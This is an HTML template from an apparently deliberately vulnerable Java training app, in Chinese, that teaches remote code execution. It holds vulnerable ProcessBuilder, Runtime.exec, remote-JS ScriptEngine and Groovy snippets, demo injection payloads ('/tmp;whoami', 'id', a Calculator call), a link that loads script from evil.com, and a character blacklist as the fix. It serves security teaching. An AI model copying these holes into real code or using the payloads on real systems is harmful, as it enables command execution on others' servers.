<!DOCTYPE html>
<html lang="en" xmlns:th="http://www.thymeleaf.org">
<div th:replace="~{commons/commons::head}"></div>

<body>
<!-- 顶部导航栏 -->
<div th:replace="~{commons/commons::topbar}"></div>

<div class="container-fluid">
    <div class="row">
        <!-- 侧边栏 -->
        <div th:replace="~{commons/commons::siderbar(active='rce.html')}"></div>

        <main role="main" class="col-md-9 ml-sm-auto col-lg-10 pt-3 px-4">
            <div class="vul_header">
                <span>远程代码执行</span>
                <a class="btn btn-sm btn-primary" target="_blank" href="">漏洞案例</a>
            </div>
            <hr>
            <div class="dec shadow-sm p-3 mb-4  rounded">RCE (Remote Code Execution), 远程代码执行漏洞，这里包含两种类型漏洞:<br>
                - 命令注入（Command Injection），在某种开发需求中，需要引入对系统本地命令的支持来完成特定功能，当未对输入做过滤时，则会产生命令注入<br>
                - 代码注入（Code Injection），在正常的java程序中注入一段java代码并执行，即用户输入的数据当作java代码进行执行。
            </div>

            <h5><span class="lnr lnr-bullhorn"> 编码建议</span></h5>
            <textarea disabled="disabled" class="form-control p-2 mb-5 rounded" id="coder">
【建议】避免不可信数据拼接操作系统命令
 当不可信数据存在时，应尽量避免外部数据拼接到操作系统命令使用 Runtime 和 ProcessBuilder 来执行。优先使用其他同类操作进行代替，比如通过文件系统API进行文件操作而非直接调用操作系统命令。

【必须】避免创建SHELL操作
 禁止外部数据直接直接作为操作系统命令执行。
 避免通过"cmd"、“bash”、“sh”等命令创建shell后拼接外部数据来执行操作系统命令。
 对外部传入数据进行过滤。可通过白名单限制字符类型，仅允许字符、数字、下划线；或过滤转义以下符号：|;&$><`（反引号）!
            </textarea>
            <hr>

            <div class="box-float">
                <div class="float1">
                    <a style="float:right" class="btn btn-sm btn-danger"
                       th:href="@{/RCE/ProcessBuilder?filepath=/tmp;whoami}">运行</a>
                    <h5><span class="lnr lnr-bug"> 漏洞代码 - ProcessBuilder方式</span></h5>

                    <textarea class="form-control" id="code1">
// 功能是利用ProcessBuilder执行ls命令查看文件，但攻击者通过拼接; & |等连接符来执行自己的命令。

@RequestMapping("/ProcessBuilder")
public static String cmd(String filepath) {
    String[] cmdList = {"sh", "-c", "ls -l " + filepath};
    StringBuilder sb = new StringBuilder();

    ProcessBuilder pb = new ProcessBuilder(cmdList);
    pb.redirectErrorStream(true);
    ...
                    </textarea><br><br>

                    <a style="float:right" class="btn btn-sm btn-danger"
                       th:href="@{/RCE/runtime?cmd=id}">运行</a>
                    <h5><span class="lnr lnr-bug"> 漏洞代码 - Runtime方式</span></h5>
                    <textarea class="form-control" id="code2">
// getRuntime()常用于执行本地命令，使用频率较高。

@RequestMapping("/runtime")
public static String cmd2(String cmd) {
    StringBuilder sb = new StringBuilder();
    try {
        Process proc = Runtime.getRuntime().exec(cmd);
        InputStream fis = proc.getInputStream();
        InputStreamReader isr = new InputStreamReader(fis);
        BufferedReader br = new BufferedReader(isr);
     ...
                    </textarea><br><br>

                    <a style="float:right" class="btn btn-sm btn-danger"
                       th:href="@{/RCE/js?url=http://evil.com/java/1.js}">运行</a>
                    <h5><span class="lnr lnr-bug"> 漏洞代码 - 远程加载JS</span></h5>
                    <textarea class="form-control" id="code3">
// 通过加载远程js文件来执行代码，如果加载了恶意js则会造成任意命令执行。
// 远程恶意js: var a = mainOutput(); function mainOutput() { var x=java.lang.Runtime.getRuntime().exec("open -a Calculator");}

@GetMapping("/js")
public void jsEngine(String url) throws Exception {
    ScriptEngine engine = new ScriptEngineManager().getEngineByName("JavaScript");
    Bindings bindings = engine.getBindings(ScriptContext.ENGINE_SCOPE);
    String payload = String.format("load('%s')", url);
    System.out.println(payload);
    engine.eval(payload, bindings);
}
                    </textarea><br><br>

                    <a style="float:right" class="btn btn-sm btn-danger" href="/RCE/groovy?cmd='open -a Calculator'.execute()">运行</a>
                    <h5><span class="lnr lnr-bug"> 漏洞代码 - Groovy执行命令</span></h5>
                    <textarea class="form-control" id="code4">
// 不安全的使用Groovy调用命令

import groovy.lang.GroovyShell;
@GetMapping("/groovy")
public void groovy(String cmd) {
    GroovyShell shell = new GroovyShell();
    shell.evaluate(cmd);
}
                    </textarea>
                </div>

                <div class="float2">
                    <a style="float:right" class="btn btn-sm btn-success"
                       th:href="@{/RCE/ProcessBuilder/safe?filepath=/tmp;whoami}">运行</a>
                    <h5><span class="lnr lnr-smile"> 安全代码 - 过滤特殊字符</span></h5>
                    <textarea class="form-control" id="code5">
// 自定义黑名单，这里过滤了常见的管道符，可自行添加

public static boolean checkOs(String content) {
    String black = "|,&,&&,;,||";
    String[] black_list = black.split(",");
    for (String s : black_list) {
        if (content.contains(s)) {
            return true;
        }
    }
    return false;
}
                    </textarea>

                </div>
            </div>
        </main>
    </div>
</div>

<!-- 引入script -->
<div th:replace="~{commons/commons::script}"></div>


</body>

</html>